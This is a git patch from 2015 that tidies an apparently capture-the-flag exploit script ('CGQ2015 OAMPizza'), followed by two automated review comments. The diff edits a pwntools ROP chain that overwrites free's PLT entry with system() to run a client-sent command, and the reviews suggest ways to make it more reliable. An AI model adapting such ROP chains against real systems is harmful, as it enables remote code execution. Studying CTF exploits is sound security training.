From bf719571b222a2d4364c620b5d3a3f7039c8fe6a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Sergiusz=20=27q3k=27=20Baza=C5=84ski?=
Date: Sun, 15 Mar 2015 21:23:43 +0100
Subject: [PATCH] Clean up CGQ2015 OAMPizza exploit
---
 CGQ2015/sploit_server.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/CGQ2015/sploit_server.py b/CGQ2015/sploit_server.py
index 6558d6b..3d2dcff 100644
--- a/CGQ2015/sploit_server.py
+++ b/CGQ2015/sploit_server.py
@@ -86,10 +86,10 @@ sent_buffer += pwn.p64(POP_RDI) + pwn.p64(0) + pwn.p64(POP_RSI_R15) + pwn.p64(SY
 sent_buffer += pwn.p64(READ)
 ## RESEND TO CLIENT FOR DEBUG
-sent_buffer += pwn.p64(POP_MANY) + pwn.p64(0xFFFFFFFFFFFFFFFF) + pwn.p64(0) + pwn.p64(0x60d088) + pwn.p64(8) + pwn.p64(0) + pwn.p64(0)
+sent_buffer += pwn.p64(POP_MANY) + pwn.p64(0xFFFFFFFFFFFFFFFF) + pwn.p64(0) + pwn.p64(0x60d088) + pwn.p64(SYSTEM_ARG_LENGTH) + pwn.p64(0) + pwn.p64(0)
 sent_buffer += pwn.p64(RDX_SHIT)
 sent_buffer += pwn.p64(8) * 7
-sent_buffer += pwn.p64(POP_RDI) + pwn.p64(1) + pwn.p64(POP_RSI_R15) + pwn.p64(LEAK_ADDRESS+8) + pwn.p64(0)
+sent_buffer += pwn.p64(POP_RDI) + pwn.p64(1) + pwn.p64(POP_RSI_R15) + pwn.p64(SYSTEM_ARG_ADDRESS) + pwn.p64(0)
 sent_buffer += pwn.p64(WRITE)
 ## OVERRIDE FREE IN PLT WITH SYSTEM CALCULATED BY CLIENT
@@ -100,7 +100,7 @@ sent_buffer += pwn.p64(POP_RDI) + pwn.p64(0) + pwn.p64(POP_RSI_R15) + pwn.p64(LE
 sent_buffer += pwn.p64(READ)
 ## CALL OVERRIDDEN FREE/SYSTEM
-sent_buffer += pwn.p64(POP_RDI) + pwn.p64(LEAK_ADDRESS+8)
+sent_buffer += pwn.p64(POP_RDI) + pwn.p64(SYSTEM_ARG_ADDRESS)
 sent_buffer += pwn.p64(POP_RBP) + pwn.p64(LEAK_ADDRESS-0x48)
 sent_buffer += pwn.p64(CALL_RBP)
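Review bot: The debug write-back on the new `+sent_buffer += pwn.p64(POP_RDI) + pwn.p64(1) ...` line now echoes SYSTEM_ARG_LENGTH bytes from SYSTEM_ARG_ADDRESS, but nothing visible in the hunk guarantees that buffer is NUL-terminated before it is handed to system() further down, so a client that sends exactly SYSTEM_ARG_LENGTH bytes makes system() parse past the buffer into whatever follows in memory. The read that fills it sits above line 86 (the truncated hunk-header context `pwn.p64(SY` suggests it already targets the same constant, but its length is not shown), so either cap that read at `SYSTEM_ARG_LENGTH - 1` and have the chain write a terminating zero, or document at the definition that the client is responsible for the NUL, e.g. `# client must send a NUL-terminated command of at most SYSTEM_ARG_LENGTH bytes`. The commit names two of the magic values in this frame but leaves `0x60d088` and the `pwn.p64(8) * 7` filler as bare literals; naming the former the same way (`RDX_SCRATCH = 0x60d088  # scratch slot consumed by the RDX_SHIT gadget — confirm`) would finish the cleanup. The ROP chain being assembled here starts before the hunk and continues past it.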
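Review bot: On the new `+sent_buffer += pwn.p64(POP_RDI) + pwn.p64(SYSTEM_ARG_ADDRESS)` line the argument pointer is now an independent constant while the call target is still reached relative to LEAK_ADDRESS (`POP_RBP` with `LEAK_ADDRESS-0x48`, then `CALL_RBP`), so the two addresses are coupled but the coupling is no longer stated anywhere in the chain; before this commit the argument was literally `LEAK_ADDRESS+8`, i.e. immediately after the 8-byte pointer the preceding read (header context `pwn.p64(LE`, presumably LEAK_ADDRESS) stores there. If SYSTEM_ARG_ADDRESS is ever defined below `LEAK_ADDRESS + 8`, or that read is allowed to write more than 8 bytes, the command string and the overwritten function pointer overlap and the exploit fails in a way that is hard to diagnose from the debug echo alone. I would pin the invariant next to the constant definitions: `assert SYSTEM_ARG_ADDRESS >= LEAK_ADDRESS + 8, "system() argument must not overlap the overwritten free slot"`. The `-0x48` is presumably the displacement inside the CALL_RBP gadget and deserves a one-line comment saying so; those constants are defined earlier in the file, outside this hunk.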